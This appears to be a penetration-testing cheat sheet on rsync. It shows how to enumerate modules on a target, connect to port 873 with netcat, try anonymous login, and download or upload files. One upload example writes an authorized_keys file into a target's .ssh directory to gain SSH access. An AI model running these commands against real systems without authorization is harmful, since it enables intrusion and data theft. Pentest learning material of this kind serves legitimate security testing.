64 lines
1.4 KiB
Markdown
64 lines
1.4 KiB
Markdown
# rsync
|
|
|
|
> rsync is an open source utility that provides fast incremental file transfer.
|
|
> rsync is freely available under the GNU General Public License and is currently
|
|
> being maintained by Wayne Davison.
|
|
> -- [rsync.samba.org](rsync.samba.org)
|
|
|
|
## Enumerate via rsync
|
|
|
|
Enumerate files and directories via rsync in the following ways
|
|
|
|
```sh
|
|
rsync <target-IP>::
|
|
rsync <target-IP>::files
|
|
rsync <target-IP>::files/foo/
|
|
```
|
|
|
|
### Enumerate through rsync protocol via netcat
|
|
|
|
Another way is the following
|
|
|
|
```sh
|
|
nc -vn $TARGET_IP 873
|
|
```
|
|
|
|
Repeat the handshake identical to the rsync binary, e.g.
|
|
|
|
```
|
|
@RSYNCD: 31.0
|
|
```
|
|
|
|
Afterwards you are able to list all directories
|
|
|
|
```sh
|
|
#list
|
|
```
|
|
|
|
## Downloads via rsync
|
|
|
|
Download files and directories through rsynv via the following commands
|
|
|
|
```sh
|
|
rsync <user>@<target-IP>::/files/foo/bar.txt .
|
|
rsync -r <user>@<target-IP>::/files/foo .
|
|
```
|
|
|
|
Login anonymously might work out in some cases, use no credentials at all to connect anonymously.
|
|
|
|
## Uploads via rsync
|
|
|
|
Upload files and directories through rsynv via the following commands
|
|
|
|
```sh
|
|
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
|
|
rsync -r documents <user>@<target-IP>::/files/foo/
|
|
```
|
|
|
|
## References
|
|
|
|
* [rsync webpage](rsync.samba.org)
|
|
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
|
|
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
|
|
|